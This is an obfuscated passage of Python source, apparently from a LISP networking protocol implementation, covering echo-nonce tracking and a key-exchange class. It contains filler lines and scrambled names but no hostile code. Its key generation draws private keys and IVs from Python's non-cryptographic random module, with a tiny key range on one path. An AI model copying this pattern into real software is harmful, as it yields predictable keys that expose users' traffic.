return ( ( self . second_long >> 8 ) & 0xffffff )
if 73 - 73: ooOoO0o + IiII % o0oOOo0O0Ooo . I1ii11iIi11i / OOooOOo . I1Ii111
if 76 - 76: I11i . I1ii11iIi11i * OoooooooOO % iII111i
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
if 24 - 24: OoooooooOO
if 83 - 83: O0 / OoO0O00
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
if 62 - 62: I11i
if 73 - 73: Ii1I % OoO0O00 * OOooOOo
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
if 84 - 84: Oo0Ooo
if 18 - 18: OoooooooOO
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
if 85 - 85: OoooooooOO . OoO0O00 . OoO0O00
if 70 - 70: I11i
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
if 72 - 72: I1Ii111 - ooOoO0o - I1IiiI - iII111i + OOooOOo - i1IIi
if 45 - 45: OoO0O00 * I1IiiI
if 61 - 61: iII111i % II111iiii / OoOoOO00 % I1ii11iIi11i . iIii1I11I1II1 % O0
class lisp_echo_nonce ( object ) :
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
if 74 - 74: I1ii11iIi11i * oO0o + iII111i % O0
if 18 - 18: i1IIi % IiII . O0 - O0 - O0 - II111iiii
def send_ipc ( self , ipc_socket , ipc ) :
OO = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
OooOOooo = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , OO )
lisp_ipc ( ipc , ipc_socket , OooOOooo )
if 84 - 84: Ii1I
if 70 - 70: iIii1I11I1II1
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
ii1I11Iii = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , ii1I11Iii )
if 3 - 3: iII111i . I1IiiI . iII111i % I1ii11iIi11i
if 9 - 9: O0 * Ii1I
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
ii1I11Iii = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , ii1I11Iii )
if 54 - 54: I11i % I11i - ooOoO0o
if 32 - 32: o0oOOo0O0Ooo % II111iiii / o0oOOo0O0Ooo . OOooOOo . o0oOOo0O0Ooo
def receive_request ( self , ipc_socket , nonce ) :
Ii1iIiIiIiI = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( Ii1iIiIiIiI != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
if 1 - 1: I1IiiI / I1IiiI
if 37 - 37: OoO0O00 - i1IIi - II111iiii . i1IIi
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
if 33 - 33: iII111i + Oo0Ooo % I11i . oO0o
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
if 6 - 6: IiII + I1ii11iIi11i
if 62 - 62: oO0o . I1Ii111 - OoooooooOO * II111iiii . i11iIiiIii
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
if 13 - 13: iIii1I11I1II1 * o0oOOo0O0Ooo - i11iIiiIii
if 63 - 63: OoooooooOO * I1Ii111
if 50 - 50: Oo0Ooo - o0oOOo0O0Ooo % II111iiii . O0 . oO0o % II111iiii
if 18 - 18: I11i % OoooooooOO + OoO0O00 / I11i
if 37 - 37: i1IIi - Ii1I / IiII . II111iiii % ooOoO0o
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
i11iIi1I1i1 = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if 92 - 92: O0
if 38 - 38: II111iiii / iII111i - o0oOOo0O0Ooo
if ( remote_rloc . address > i11iIi1I1i1 . address ) :
OoOOOO = "exit"
self . request_nonce_sent = None
else :
OoOOOO = "stay in"
self . echo_nonce_sent = None
if 92 - 92: Oo0Ooo % o0oOOo0O0Ooo - ooOoO0o / ooOoO0o / OoOoOO00
if 84 - 84: OOooOOo
I1 = bold ( "collision" , False )
i1IIiI1iII = red ( i11iIi1I1i1 . print_address_no_iid ( ) , False )
I1I1iIiiiiII11 = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( I1 ,
i1IIiI1iII , I1I1iIiiiiII11 , OoOOOO ) )
if 55 - 55: I1ii11iIi11i / OoooooooOO - OoO0O00 / I1IiiI
if 23 - 23: I11i * I1Ii111 * o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + o0oOOo0O0Ooo
if 41 - 41: IiII * OoooooooOO . ooOoO0o % i11iIiiIii
if 11 - 11: iIii1I11I1II1 . I1Ii111 - Oo0Ooo / I11i + II111iiii
if 29 - 29: I11i . i11iIiiIii + i1IIi - Ii1I + O0 . I1IiiI
if ( self . echo_nonce_sent != None ) :
OOO0O0O = self . echo_nonce_sent
I1i = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( I1i ,
lisp_hex_string ( OOO0O0O ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( OOO0O0O )
if 8 - 8: o0oOOo0O0Ooo
if 78 - 78: i1IIi - Oo0Ooo
if 48 - 48: Ii1I - OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
if 42 - 42: I1Ii111
if 70 - 70: o0oOOo0O0Ooo / I11i + oO0o % I1IiiI % Oo0Ooo + OoO0O00
if 80 - 80: OOooOOo
if 12 - 12: Ii1I
OOO0O0O = self . request_nonce_sent
i1Ii = self . last_request_nonce_sent
if ( OOO0O0O and i1Ii != None ) :
if ( time . time ( ) - i1Ii >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( OOO0O0O ) ) )
if 40 - 40: IiII . OoooooooOO . I1IiiI + O0 % i1IIi / IiII
return ( None )
if 36 - 36: OoooooooOO - OoOoOO00 - OoO0O00 * I1Ii111 - oO0o
if 99 - 99: ooOoO0o / I1IiiI . Ii1I - Ii1I * I1IiiI
if 24 - 24: I11i * OoO0O00 - oO0o / iIii1I11I1II1 - Oo0Ooo . OOooOOo
if 2 - 2: ooOoO0o - O0 - I1ii11iIi11i / I11i * OoOoOO00
if 26 - 26: I1ii11iIi11i + I1Ii111 - oO0o + IiII % OOooOOo
if 84 - 84: I11i % Ii1I % O0 * o0oOOo0O0Ooo
if 15 - 15: oO0o - iIii1I11I1II1 - II111iiii - IiII % I1ii11iIi11i
if 80 - 80: IiII * iII111i . i1IIi % Ii1I % I1ii11iIi11i + ooOoO0o
if 6 - 6: I1ii11iIi11i . oO0o . OoO0O00 + IiII
if ( OOO0O0O == None ) :
OOO0O0O = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( OOO0O0O )
if 65 - 65: I1ii11iIi11i / ooOoO0o
self . request_nonce_sent = OOO0O0O
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( OOO0O0O ) ) )
if 23 - 23: OOooOOo / OOooOOo * o0oOOo0O0Ooo * OOooOOo
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if 57 - 57: iII111i
if 29 - 29: I1IiiI
if 41 - 41: I1Ii111 * OoO0O00 - iII111i . Ii1I
if 41 - 41: iIii1I11I1II1 - O0 - I1ii11iIi11i - oO0o + I1Ii111
if 22 - 22: O0 % IiII % iII111i % I1IiiI
if ( lisp_i_am_itr == False ) : return ( OOO0O0O | 0x80000000 )
self . send_request_ipc ( ipc_socket , OOO0O0O )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( OOO0O0O ) ) )
if 34 - 34: iII111i . Oo0Ooo % I1ii11iIi11i . iII111i % IiII / IiII
if 84 - 84: Ii1I
if 1 - 1: oO0o - Oo0Ooo * iIii1I11I1II1 * Oo0Ooo * i1IIi
if 9 - 9: iII111i - iII111i
if 3 - 3: O0 + O0 - O0 - O0 % OoooooooOO + oO0o
if 20 - 20: OoO0O00 + I11i . II111iiii / i11iIiiIii
if 50 - 50: OoooooooOO / OoO0O00 % iIii1I11I1II1
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( OOO0O0O | 0x80000000 )
if 41 - 41: I1ii11iIi11i % I1ii11iIi11i + IiII . iII111i % I1Ii111 * ooOoO0o
if 57 - 57: Ii1I . I1Ii111 . II111iiii % OoooooooOO * O0 + iIii1I11I1II1
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
if 94 - 94: i1IIi * OoO0O00 * OoOoOO00
Ii1i1 = time . time ( ) - self . last_request_nonce_sent
o000 = self . last_echo_nonce_rcvd
return ( Ii1i1 >= LISP_NONCE_ECHO_INTERVAL and o000 == None )
if 8 - 8: Oo0Ooo
if 22 - 22: ooOoO0o % OoOoOO00 / o0oOOo0O0Ooo
def recently_requested ( self ) :
o000 = self . last_request_nonce_sent
if ( o000 == None ) : return ( False )
if 98 - 98: OoO0O00 / o0oOOo0O0Ooo * I1IiiI
Ii1i1 = time . time ( ) - o000
return ( Ii1i1 <= LISP_NONCE_ECHO_INTERVAL )
if 60 - 60: I1ii11iIi11i / IiII . i11iIiiIii / OoO0O00 % II111iiii
if 6 - 6: iII111i % o0oOOo0O0Ooo + I1Ii111
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
if 91 - 91: o0oOOo0O0Ooo + O0 * oO0o * IiII * I1ii11iIi11i
if 83 - 83: OoooooooOO
if 52 - 52: o0oOOo0O0Ooo / OoOoOO00 % oO0o % OoO0O00 / IiII % o0oOOo0O0Ooo
if 88 - 88: OOooOOo / i11iIiiIii / Ii1I / i11iIiiIii * I1ii11iIi11i % I11i
o000 = self . last_good_echo_nonce_rcvd
if ( o000 == None ) : o000 = 0
Ii1i1 = time . time ( ) - o000
if ( Ii1i1 <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
if 43 - 43: OoOoOO00 * OoO0O00 % i1IIi * Ii1I + iIii1I11I1II1
if 80 - 80: o0oOOo0O0Ooo . iII111i . OoooooooOO
if 63 - 63: ooOoO0o . OOooOOo
if 66 - 66: I1IiiI
if 99 - 99: OoO0O00 % O0 . I1Ii111 - I1ii11iIi11i . Oo0Ooo / OoOoOO00
if 60 - 60: I1ii11iIi11i
o000 = self . last_new_request_nonce_sent
if ( o000 == None ) : o000 = 0
Ii1i1 = time . time ( ) - o000
return ( Ii1i1 <= LISP_NONCE_ECHO_INTERVAL )
if 78 - 78: oO0o + II111iiii
if 55 - 55: OoooooooOO
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
ooO0O = bold ( "down" , False )
O0Ooo0O0O = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , ooO0O , O0Ooo0O0O ) )
if 63 - 63: OoOoOO00 / OoOoOO00 - I1Ii111 % OOooOOo
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if 45 - 45: IiII / Oo0Ooo + OoooooooOO
if 77 - 77: oO0o . Ii1I / O0 * oO0o
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if 98 - 98: Oo0Ooo - oO0o . I1Ii111
if ( self . recently_requested ( ) == False ) :
O0o = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , O0o ) )
if 58 - 58: Ii1I % OOooOOo - i11iIiiIii
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
if 65 - 65: Oo0Ooo % IiII % IiII - Oo0Ooo % I11i
if 34 - 34: OOooOOo . IiII / OoooooooOO
if 75 - 75: OoooooooOO / OoOoOO00 - iIii1I11I1II1 + oO0o % i1IIi / ooOoO0o
def print_echo_nonce ( self ) :
O00o0O0OoOo0 = lisp_print_elapsed ( self . last_request_nonce_sent )
o00o0O0o0o0 = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
if 35 - 35: iIii1I11I1II1 % I1Ii111 * I11i . Oo0Ooo
I11IiiI1 = lisp_print_elapsed ( self . last_echo_nonce_sent )
oOo0 = lisp_print_elapsed ( self . last_request_nonce_rcvd )
I1iiIi111I = space ( 4 )
if 52 - 52: iIii1I11I1II1 * OoOoOO00 + o0oOOo0O0Ooo . I11i
OoiIIIiIi1I1i = "Nonce-Echoing:\n"
OoiIIIiIi1I1i += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( I1iiIi111I , O00o0O0OoOo0 , I1iiIi111I , o00o0O0o0o0 )
if 59 - 59: iII111i . i1IIi
OoiIIIiIi1I1i += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( I1iiIi111I , oOo0 , I1iiIi111I , I11IiiI1 )
if 31 - 31: I1IiiI + I1IiiI
if 11 - 11: IiII + OoOoOO00 % o0oOOo0O0Ooo * OoO0O00 / IiII
return ( OoiIIIiIi1I1i )
if 5 - 5: iII111i / oO0o % ooOoO0o . i11iIiiIii % OoOoOO00 + oO0o
if 95 - 95: I1ii11iIi11i
if 48 - 48: I11i
if 14 - 14: iIii1I11I1II1 / o0oOOo0O0Ooo * IiII
if 35 - 35: iIii1I11I1II1
if 34 - 34: OoO0O00 % I1IiiI . o0oOOo0O0Ooo % OoO0O00 % OoO0O00
if 30 - 30: I1IiiI + I1IiiI
if 75 - 75: I1IiiI - ooOoO0o - I1IiiI % oO0o % OoooooooOO
if 13 - 13: ooOoO0o * OoO0O00 % iIii1I11I1II1 / IiII * iII111i . Oo0Ooo
class lisp_keys ( object ) :
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
if 23 - 23: ooOoO0o / IiII . iII111i * Ii1I
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
III11II111 = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( III11II111 )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
if 87 - 87: i11iIiiIii
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
if 34 - 34: i1IIi
if 64 - 64: iIii1I11I1II1 / IiII / Oo0Ooo - I1ii11iIi11i
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
if 100 - 100: IiII + i1IIi * OoO0O00
if 64 - 64: oO0o * i11iIiiIii . Oo0Ooo
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
if 52 - 52: Oo0Ooo / ooOoO0o / iII111i - o0oOOo0O0Ooo / iII111i
iI1ii = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
iI1ii = struct . pack ( "Q" , iI1ii & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
ooIi = struct . pack ( "I" , ( iI1ii >> 64 ) & LISP_4_32_MASK )
iii1I = struct . pack ( "Q" , iI1ii & LISP_8_64_MASK )
iI1ii = ooIi + iii1I
else :
iI1ii = struct . pack ( "QQ" , iI1ii >> 64 , iI1ii & LISP_8_64_MASK )
return ( iI1ii )
if 3 - 3: OoOoOO00
if 52 - 52: OoOoOO00
def key_length ( self , key ) :
if ( type ( key ) != str ) : key = self . normalize_pub_key ( key )
return ( old_div ( len ( key ) , 2 ) )
if 79 - 79: I1IiiI + Oo0Ooo % OoOoOO00 - IiII + I1IiiI * oO0o
if 52 - 52: OoOoOO00 % I1ii11iIi11i * Oo0Ooo % OoooooooOO - OoO0O00
def print_key ( self , key ) :
I11IIIIiI1 = self . normalize_pub_key ( key )
return ( "0x{}...{}({})" . format ( I11IIIIiI1 [ 0 : 4 ] , I11IIIIiI1 [ - 4 : : ] , self . key_length ( I11IIIIiI1 ) ) )
if 13 - 13: OOooOOo . Ii1I / I11i
if 93 - 93: ooOoO0o * I1IiiI * I1ii11iIi11i / I1ii11iIi11i
def normalize_pub_key ( self , key ) :
if ( type ( key ) == str ) :
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
if 62 - 62: ooOoO0o * Ii1I % I1ii11iIi11i - i1IIi - I1ii11iIi11i
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
if 24 - 24: OOooOOo
if 71 - 71: IiII - i1IIi
def print_keys ( self , do_bold = True ) :
i1IIiI1iII = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
i1IIiI1iII += "none"
else :
i1IIiI1iII += self . print_key ( self . local_public_key )
if 56 - 56: OoOoOO00 + oO0o
I1I1iIiiiiII11 = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
I1I1iIiiiiII11 += "none"
else :
I1I1iIiiiiII11 += self . print_key ( self . remote_public_key )
if 74 - 74: iII111i / I1Ii111 / II111iiii - iII111i / oO0o % I11i
i1Iiiiii1II = "ECDH" if ( self . curve25519 ) else "DH"
i1iII1i = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( i1Iiiiii1II , i1iII1i , i1IIiI1iII , I1I1iIiiiiII11 ) )
if 15 - 15: O0 % Oo0Ooo % IiII % OoooooooOO - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo * I1ii11iIi11i - I1IiiI
def compare_keys ( self , keys ) :
if ( self . dh_g_value != keys . dh_g_value ) : return ( False )
if ( self . dh_p_value != keys . dh_p_value ) : return ( False )
if ( self . remote_public_key != keys . remote_public_key ) : return ( False )
return ( True )
if 22 - 22: Oo0Ooo % OoooooooOO - Oo0Ooo - iII111i . Ii1I
if 100 - 100: II111iiii / I1Ii111 / iII111i - I1ii11iIi11i * iIii1I11I1II1
def compute_public_key ( self ) :
if ( self . curve25519 ) : return ( self . curve25519 . get_public ( ) . public )
if 7 - 7: i1IIi . IiII % i11iIiiIii * I1ii11iIi11i . I11i % I1ii11iIi11i
III11II111 = self . local_private_key
o0O0Ooo = self . dh_g_value
o00oo = self . dh_p_value
return ( int ( ( o0O0Ooo ** III11II111 ) % o00oo ) )
if 35 - 35: I1IiiI
if 48 - 48: OoooooooOO % OoooooooOO - OoO0O00 . OoOoOO00
def compute_shared_key ( self , ed , print_shared = False ) :
III11II111 = self . local_private_key
I1iiii = self . remote_public_key
if 69 - 69: OoOoOO00 + O0 - I11i - iIii1I11I1II1 . OoO0O00
i1IO00oO0oOOOOOO = bold ( "Compute {} shared-key" . format ( ed ) , False )
lprint ( "{}, key-material: {}" . format ( i1IO00oO0oOOOOOO , self . print_keys ( ) ) )
if 88 - 88: iIii1I11I1II1 % II111iiii % II111iiii . OOooOOo % oO0o
if ( self . curve25519 ) :
iIoo0O0 = curve25519 . Public ( I1iiii )
self . shared_key = self . curve25519 . get_shared_key ( iIoo0O0 )
else :
o00oo = self . dh_p_value
self . shared_key = ( I1iiii ** III11II111 ) % o00oo
if 37 - 37: iII111i % I11i . iII111i - OOooOOo / iIii1I11I1II1 - OOooOOo
if 50 - 50: O0
if 97 - 97: II111iiii
if 43 - 43: Oo0Ooo / I1Ii111 / i1IIi
if 3 - 3: Ii1I * ooOoO0o . OoO0O00 * OoooooooOO + OoOoOO00 / O0
if 60 - 60: I11i
if 97 - 97: i11iIiiIii * iIii1I11I1II1 / II111iiii
if ( print_shared ) :
I11IIIIiI1 = self . print_key ( self . shared_key )
lprint ( "Computed shared-key: {}" . format ( I11IIIIiI1 ) )
if 66 - 66: II111iiii + iII111i * oO0o % I11i / i1IIi / iIii1I11I1II1
if 62 - 62: OoOoOO00 + oO0o * IiII + O0 / OOooOOo + ooOoO0o
if 38 - 38: i1IIi / iIii1I11I1II1 + iII111i
if 26 - 26: I1ii11iIi11i . Ii1I % o0oOOo0O0Ooo
if 4 - 4: I1Ii111
self . compute_encrypt_icv_keys ( )
if 80 - 80: Oo0Ooo . O0 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 52 - 52: OoO0O00 % i11iIiiIii . ooOoO0o % OoOoOO00 % OoooooooOO
if 5 - 5: OoOoOO00 / O0 / i11iIiiIii
if 88 - 88: II111iiii - iII111i / OoooooooOO
self . rekey_count += 1
self . last_rekey = lisp_get_timestamp ( )
if 71 - 71: I1ii11iIi11i
if 19 - 19: Oo0Ooo - OoO0O00 + i11iIiiIii / iIii1I11I1II1
def compute_encrypt_icv_keys ( self ) :
i1iI11IiII = hashlib . sha256
if ( self . curve25519 ) :
oO00Oo0OO = self . shared_key
else :
oO00Oo0OO = lisp_hex_string ( self . shared_key )
if 32 - 32: Ii1I - Ii1I
if 6 - 6: iIii1I11I1II1 - i11iIiiIii / I1ii11iIi11i - o0oOOo0O0Ooo
if 95 - 95: I11i
if 76 - 76: II111iiii - i1IIi . O0 * i11iIiiIii % o0oOOo0O0Ooo - iII111i
if 30 - 30: I1Ii111 % oO0o + oO0o * OoooooooOO - I1ii11iIi11i
i1IIiI1iII = self . local_public_key
if ( type ( i1IIiI1iII ) != int ) : i1IIiI1iII = int ( binascii . hexlify ( i1IIiI1iII ) , 16 )
I1I1iIiiiiII11 = self . remote_public_key
if ( type ( I1I1iIiiiiII11 ) != int ) : I1I1iIiiiiII11 = int ( binascii . hexlify ( I1I1iIiiiiII11 ) , 16 )
OOoOOo = "0001" + "lisp-crypto" + lisp_hex_string ( i1IIiI1iII ^ I1I1iIiiiiII11 ) + "0100"
if 22 - 22: OoOoOO00 . II111iiii
ii111 = hmac . new ( OOoOOo . encode ( ) , oO00Oo0OO , i1iI11IiII ) . hexdigest ( )
ii111 = int ( ii111 , 16 )
if 60 - 60: ooOoO0o * i11iIiiIii + I1Ii111 % OoooooooOO
if 44 - 44: i11iIiiIii - o0oOOo0O0Ooo + o0oOOo0O0Ooo % O0 / OoooooooOO . OOooOOo
if 3 - 3: O0 - I1Ii111 * Ii1I * OOooOOo / Ii1I
if 58 - 58: Ii1I * iIii1I11I1II1 + ooOoO0o . ooOoO0o
O00O00000 = ( ii111 >> 128 ) & LISP_16_128_MASK
iI1II1IIIIi = ii111 & LISP_16_128_MASK
self . encrypt_key = lisp_hex_string ( O00O00000 ) . zfill ( 32 )
IiIIi = 32 if self . do_poly else 40
self . icv_key = lisp_hex_string ( iI1II1IIIIi ) . zfill ( IiIIi )
if 85 - 85: O0 + O0 - O0 - IiII . I1ii11iIi11i % Ii1I
if 60 - 60: OoooooooOO * Oo0Ooo % I1Ii111
def do_icv ( self , packet , nonce ) :
if ( self . icv_key == None ) : return ( "" )
if ( self . do_poly ) :
OooO0o00O = self . icv . poly1305aes
iIii11IiIi1I = self . icv . binascii . hexlify
nonce = iIii11IiIi1I ( nonce )
OoO000oOO = OooO0o00O ( self . encrypt_key , self . icv_key , nonce , packet )
OoO000oOO = iIii11IiIi1I ( OoO000oOO )
else :
III11II111 = binascii . unhexlify ( self . icv_key )
OoO000oOO = hmac . new ( III11II111 , packet , self . icv ) . hexdigest ( )
OoO000oOO = OoO000oOO [ 0 : 40 ]
if 25 - 25: i11iIiiIii - OoOoOO00
return ( OoO000oOO )
if 32 - 32: i11iIiiIii
if 57 - 57: iIii1I11I1II1
def add_key_by_nonce ( self , nonce ) :
if ( nonce not in lisp_crypto_keys_by_nonce ) :
lisp_crypto_keys_by_nonce [ nonce ] = [ None , None , None , None ]
if 99 - 99: iII111i % o0oOOo0O0Ooo + iIii1I11I1II1
lisp_crypto_keys_by_nonce [ nonce ] [ self . key_id ] = self
if 51 - 51: i1IIi % o0oOOo0O0Ooo - oO0o - IiII
if 14 - 14: ooOoO0o + Ii1I
def delete_key_by_nonce ( self , nonce ) :
if ( nonce not in lisp_crypto_keys_by_nonce ) : return
lisp_crypto_keys_by_nonce . pop ( nonce )
if 45 - 45: oO0o + II111iiii . iII111i / I1ii11iIi11i
if 76 - 76: Ii1I + iII111i - IiII * iIii1I11I1II1 % i1IIi
def add_key_by_rloc ( self , addr_str , encap ) :
O0ooOo = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
if 34 - 34: OoooooooOO . II111iiii * iIii1I11I1II1 / O0 . I1IiiI
if 4 - 4: i11iIiiIii / I1ii11iIi11i
if ( addr_str not in O0ooOo ) :
O0ooOo [ addr_str ] = [ None , None , None , None ]
if 41 - 41: Ii1I
O0ooOo [ addr_str ] [ self . key_id ] = self
if 49 - 49: Ii1I % II111iiii . Ii1I - o0oOOo0O0Ooo - I11i * IiII
if 47 - 47: O0 . o0oOOo0O0Ooo / Ii1I * iII111i
if 63 - 63: I1Ii111 - oO0o - iII111i - ooOoO0o / oO0o + OoO0O00
if 94 - 94: IiII / I1IiiI . II111iiii
if 32 - 32: oO0o . OOooOOo % OOooOOo . OoOoOO00
if ( encap == False ) :
lisp_write_ipc_decap_key ( addr_str , O0ooOo [ addr_str ] )
if 37 - 37: OOooOOo + O0 + OOooOOo . iII111i . o0oOOo0O0Ooo
if 78 - 78: I1IiiI / I11i + o0oOOo0O0Ooo . Oo0Ooo / O0
if 49 - 49: I1ii11iIi11i
def encode_lcaf ( self , rloc_addr ) :
oOO = self . normalize_pub_key ( self . local_public_key )
iI111I = self . key_length ( oOO )
i1iiII1I1I1ii = ( 6 + iI111I + 2 )
if ( rloc_addr != None ) : i1iiII1I1I1ii += rloc_addr . addr_length ( )
if 23 - 23: i11iIiiIii % IiII . Ii1I + Ii1I * IiII
OO0Oo00OO0oo = struct . pack ( "HBBBBHBB" , socket . htons ( LISP_AFI_LCAF ) , 0 , 0 ,
LISP_LCAF_SECURITY_TYPE , 0 , socket . htons ( i1iiII1I1I1ii ) , 1 , 0 )
if 19 - 19: O0 % I1IiiI + oO0o
if 23 - 23: OOooOOo
if 68 - 68: OoooooooOO
if 18 - 18: Ii1I * OoO0O00
if 89 - 89: OoO0O00 + oO0o % iIii1I11I1II1 + I11i / O0
if 38 - 38: ooOoO0o - o0oOOo0O0Ooo - O0 + ooOoO0o % OoOoOO00 . o0oOOo0O0Ooo
i1iII1i = self . cipher_suite
OO0Oo00OO0oo += struct . pack ( "BBH" , i1iII1i , 0 , socket . htons ( iI111I ) )
if 40 - 40: iIii1I11I1II1 * OoooooooOO * I1Ii111 - Ii1I + i11iIiiIii
if 81 - 81: OoO0O00 * OoooooooOO / iII111i
if 8 - 8: O0 * i1IIi - OoOoOO00 % I1IiiI / I1ii11iIi11i
if 39 - 39: I1ii11iIi11i . oO0o * II111iiii + I1IiiI - iIii1I11I1II1
for OoOOoO0oOo in range ( 0 , iI111I * 2 , 16 ) :
III11II111 = int ( oOO [ OoOOoO0oOo : OoOOoO0oOo + 16 ] , 16 )
OO0Oo00OO0oo += struct . pack ( "Q" , byte_swap_64 ( III11II111 ) )
if 56 - 56: IiII - Ii1I + i11iIiiIii * OoO0O00 % I1IiiI
if 37 - 37: iIii1I11I1II1 + IiII / I1Ii111 . OoooooooOO
if 72 - 72: oO0o % ooOoO0o % OOooOOo
if 63 - 63: OoO0O00 . Ii1I % II111iiii / I11i - OoOoOO00
if 4 - 4: Oo0Ooo - O0 / I11i + O0 - oO0o * Oo0Ooo
if ( rloc_addr ) :
OO0Oo00OO0oo += struct . pack ( "H" , socket . htons ( rloc_addr . afi ) )
OO0Oo00OO0oo += rloc_addr . pack_address ( )
if 25 - 25: I1IiiI
return ( OO0Oo00OO0oo )
if 64 - 64: oO0o
if 80 - 80: o0oOOo0O0Ooo % iIii1I11I1II1
def decode_lcaf ( self , packet , lcaf_len ) :
if 63 - 63: IiII * i11iIiiIii
